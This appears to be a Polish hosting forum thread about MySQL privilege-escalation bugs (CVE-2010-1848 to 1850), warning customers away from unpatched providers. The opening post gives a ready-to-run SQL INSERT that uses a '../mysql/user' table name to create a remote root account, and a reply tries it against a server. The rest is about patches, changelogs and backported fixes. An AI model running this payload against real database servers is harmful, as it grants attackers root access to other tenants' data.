Skocz do zawartości
Zaloguj się, aby obserwować  
Gość pioklo

mysql i uslugodawcy

Polecane posty

Gość pioklo

Witam

 

Mysql niedawno zalatal pewna luke bezpieczenstwa w serwerze

Bug#53371, CVE-2010-1848

Bug#53237, CVE-2010-1850

Bug#50974, CVE-2010-1849

 

wiekszosc firm hostingowych jest podatna na ten atak .Atakujacy moze zmienic sobie haslo roota przez proste zapytanie UPDATE i

miec dostep do calej bazy i wszystkich danych

Jezeli baza jest dzielona miedzy uzytkownikami a tak zazwyczaj jest wystarczy polaczyc sie do niej i wykonac zapytanie sql

 

INSERT INTO `../mysql/user` (Host,User,Password,Select_priv,Insert_priv) VALUES('%','root',PASSWORD('pass3'),'Y','Y');

 

i mozemy cieszyc sie zdalnym dostepem do wszystkich danych.Nie ma co pisac ktora firma nie zaktualizowala jeszcze tych luk ale wystarczy popatrzec na wersje serwera jaki uzywaja jezeli wersja jest mniejsza od 5.1.47 lub 5.0.91 to nie zakladalbym konta w takiej firmie

 

pozdrawiam

Piotr

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

$ mysql -u monty -h 192.168.1.16 -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 1
Server version: 5.0.83-log OpenBSD port: mysql-server-5.0.83

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> INSERT INTO `../mysql/user` (Host,User,Password,Select_priv,Insert_priv) VALUES('%','root',PASSWORD('pass3'),'Y','Y' );
ERROR 1103 (42000): Incorrect table name '../mysql/user'

Fail?

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Gość pioklo

 

ERROR 1103 (42000): Incorrect table name '../mysql/user'[/code]

Fail?

 

In MySQL 5.0 and above, this allowed an authenticated user with

SELECT privileges on one table to obtain the field definitions of any

table in all other databases and potentially of other MySQL instances

accessible from the server's file system.

 

w wersji 5.0 jest mozliwosc odczytania definicji dowolnej tabeli natomiast w 5.1 mozna uzyc insertu czy update tak jak to wyzej napisalem.Do wersji starszych 4.1 i 4.0 goddaddy wydal napisal odpowiednie pacze sa dostepne na

https://launchpad.net/~percona-dev/percona-patches/4.1.24

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
w wersji 5.0 jest mozliwosc odczytania definicji dowolnej tabeli

Pff... Czyli wielkie halo o nic? :)

 

natomiast w 5.1 mozna uzyc insertu czy update tak jak to wyzej napisalem.

Pokaż mi usługodawcę w Polsce, który ma 5.1 i jeszcze go nie zaktualizował :)

 

Do wersji starszych 4.1 i 4.0 goddaddy wydal napisal odpowiednie pacze sa dostepne na

https://launchpad.net/~percona-dev/percona-patches/4.1.24

Nie GoDaddy, tylko Percona :)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
5.1 wersje uzywa duzo firm nie ma sensu tutaj wytykac palcami.

Nie twierdzę, że nie używają 5.1. Mam natomiast cichą nadzieję, że jeżeli jakaś firma używa wersji innej niż ta ze standardowej paczki (która w większości przypadków nadal pochodzi z linii 5.0.x), to zatrudnia kogoś, kto w ciągu 2 tygodni potrafił zrobić aktualizację :)

 

Pacze do wersji 4.1 wydal godaddy a nie percona jak twierdzisz..

http://www.mysqlperformanceblog.com/2010/06/02/security-fixes-for-mysql-4-0-and-4-1/

Faktycznie, mój błąd.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Problem faktycznie występuje w mysql 5.1.45 (5.1.x) i nie występuje w 5.1.47, co właśnie sam sprawdziłem. Luka pozwana na uzyskanie uparwnień roota w mysql-u, zmianę hasła dowolnego usera, zmianę uprawnień dowolnego usera itd.

 

Nie ma co chłopaki od mysql się bardzo nie popisali, szczególnie nie informując wogóle o istnieniu problemu w changelogu

http://dev.mysql.com...ews-5-1-47.html

 

Kto mi pokaże gdzie w changelogu jest informacja o załataniu tego KRYTYCZNEGO problemu? Są 3 informacje securityfix, ale żadna raczej nie pasuje do tego problemu, a już napewno nie mówi o wadze problemu. Nie no po prostu za***iście się spisali informując o swojej wpadce dry.gif

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Ja nic o tym nie wiem, żeby jakaś luka była w mysqlu, jeszcze się z takim przypadkiem nie spotkałem.

 

to przeczytaj wyżej smile.gif

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Nie ma co chłopaki od mysql się bardzo nie popisali, szczególnie nie informując wogóle o istnieniu problemu w changelogu

http://dev.mysql.com...ews-5-1-47.html

 

Kto mi pokaże gdzie w changelogu jest informacja o załataniu tego KRYTYCZNEGO problemu? Są 3 informacje securityfix, ale żadna raczej nie pasuje do tego problemu, a już napewno nie mówi o wadze problemu. Nie no po prostu za***iście się spisali informując o swojej wpadce dry.gif

Pierwszy Security Fix.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

jezeli wersja jest mniejsza od 5.1.47 lub 5.0.91 to nie zakladalbym konta w takiej firmie

 

Bardzo mądre - a jak ktoś używa paczek np. centosa gdzie najnowsza wersja która jest zabezpieczona to 5.0.77 bo backportuja fixy?

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Bądź aktywny! Zaloguj się lub utwórz konto

Tylko zarejestrowani użytkownicy mogą komentować zawartość tej strony

Utwórz konto

Zarejestruj nowe konto, to proste!

Zarejestruj nowe konto

Zaloguj się

Posiadasz własne konto? Użyj go!

Zaloguj się

Zaloguj się, aby obserwować  

×